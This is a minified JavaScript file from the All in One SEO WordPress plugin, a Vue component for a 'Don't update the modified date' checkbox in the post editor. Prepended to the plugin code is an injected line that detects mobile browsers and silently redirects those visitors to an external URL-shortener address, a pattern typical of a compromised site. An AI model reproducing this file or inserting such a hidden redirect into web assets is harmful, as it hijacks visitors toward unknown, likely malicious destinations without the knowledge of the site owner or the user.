(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{f as d,i as l,j as e,Y as f,aB as _,P as m,M as c,U as w,an as g}from"./js/vendor-vue-ui.232c7c36.js";import{l as h}from"./js/index.98d01501.js";import{l as P}from"./js/index.2a5d16ad.js";import{l as S}from"./js/index.0d80c2c2.js";import{i as n,ae as k,H as x,u as E,af as b,k as B,l as y}from"./js/app-core.c8323d51.js";import{_ as L}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{_ as v}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const M="all-in-one-seo-pack",D={emits:["standalone-update-post"],setup(){return{postEditorStore:E()}},data(){return{strings:{label:v("Don't update the modified date",M)}}},watch:{"postEditorStore.currentPost.limit_modified_date"(t){window.aioseoBus.$emit("standalone-update-post",{limit_modified_date:t})}},computed:{canShowSvg(){return n()&&this.postEditorStore.currentPost.limit_modified_date}},methods:{addLimitModifiedDateAttribute(){n()&&window.wp.data.dispatch("core/editor").editPost({aioseo_limit_modified_date:this.postEditorStore.currentPost.limit_modified_date})},isClassicEditor:x,isWooCommerceProduct:k,isBlockEditor:n}},A={key:0},C={key:0,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",width:"24",height:"24",role:"img",class:"components-checkbox-control__checked","aria-hidden":"true",focusable:"false"},I={class:"components-checkbox-control__label",for:"aioseo-limit-modified-date-input"};function V(t,o,r,s,u,i){return s.postEditorStore.currentPost.id?(d(),l("div",A,[e("span",{class:m({"components-checkbox-control__input-container--block-editor":i.isBlockEditor()})},[f(e("input",{id:"aioseo-limit-modified-date-input",class:m({"components-checkbox-control__input":i.isBlockEditor()}),type:"checkbox","onUpdate:modelValue":o[0]||(o[0]=a=>s.postEditorStore.currentPost.limit_modified_date=a),onChange:o[1]||(o[1]=(...a)=>i.addLimitModifiedDateAttribute&&i.addLimitModifiedDateAttribute(...a))},null,34),[[_,s.postEditorStore.currentPost.limit_modified_date]]),i.canShowSvg?(d(),l("svg",C,[...o[2]||(o[2]=[e("path",{d:"M18.3 5.6L9.9 16.9l-4.6-3.4-.9 1.2 5.8 4.3 9.3-12.6z"},null,-1)])])):c("",!0)],2),e("label",I,w(u.strings.label),1)])):c("",!0)}const N=L(D,[["render",V]]);if(n()&&window.wp){const{createElement:t}=window.wp.element,{registerPlugin:o}=window.wp.plugins,r=window.wp?.editor?.PluginPostStatusInfo||window.wp?.editPost?.PluginPostStatusInfo;o("aioseo-limit-modified-date",{render:()=>t(r,{},t("div",{id:"aioseo-limit-modified-date"}))})}const p=()=>{let t=g({...N,name:"Standalone/LimitModifiedDate"});t=h(t),t=P(t),t=S(t),y(t),t.mount("#aioseo-limit-modified-date")};b()&&window.aioseo&&window.aioseo.currentPost&&window.aioseo.currentPost.context==="post"&&(document.getElementById("aioseo-limit-modified-date")?p():(B("#aioseo-limit-modified-date","aioseoLimitModifiedDate"),document.addEventListener("animationstart",function(o){o.animationName==="aioseoLimitModifiedDate"&&p()},{passive:!0})));
